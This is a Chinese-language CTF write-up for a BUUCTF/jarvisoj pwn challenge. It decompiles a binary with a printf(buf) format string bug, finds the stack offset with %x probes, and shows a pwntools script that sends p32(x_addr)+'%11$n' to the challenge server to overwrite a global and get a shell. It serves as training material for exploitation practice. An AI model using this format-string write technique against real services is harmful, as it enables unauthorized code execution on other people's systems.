标签：11 buuctf addr .% jarvisoj 地址 pwn buf payload

IDA查看

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[80]; // [esp+2Ch] [ebp-5Ch] BYREF
  unsigned int v5; // [esp+7Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  be_nice_to_people();
  memset(buf, 0, sizeof(buf));
  read(0, buf, 0x50u);
  printf(buf);
  printf("%d!\n", x);
  if ( x == 4 )
  {
    puts("running sh...");
    system("/bin/sh");
  }
  return 0;
}

x的地址 0804A02C

.data:0804A02C x dd 3 ; DATA XREF: main+65↑r
查看得知是格式化漏洞
第10行存在格式化字符串漏洞，我们可以利用它随意读写的特性让x=4
x_addr=0x804A02C

AAAAA.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x
那么可以看到输入点的参数在栈上存储的位置，手动输入计算得到偏移为11

利用x的地址配合上%11$n 将x修改为4

payload=p32(x_addr)+"%11$n"

稍微解释一下payload，首先传入x参数的地址，这个地址存放在栈上偏移为11的位置，利用%11$n，定位到了偏移为11的位置,往这个位置写入数据，写入的数据由%11$n前面的参数的长度决定，而我们的x参数的地址，正好是4位，不需要添a来补齐位数就可以直接利用，将x参数的地址的值改成了4，获取了shell

from pwn import *

r=remote('node4.buuoj.cn',25359)
x_addr=0x804A02C

payload=p32(x_addr).decode('unicode_escape')+"%11$n"

r.sendline(payload)

r.interactive()

标签：11,buuctf,addr,.%,jarvisoj,地址,pwn,buf,payload
来源： https://www.cnblogs.com/socialbiao/p/15699697.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。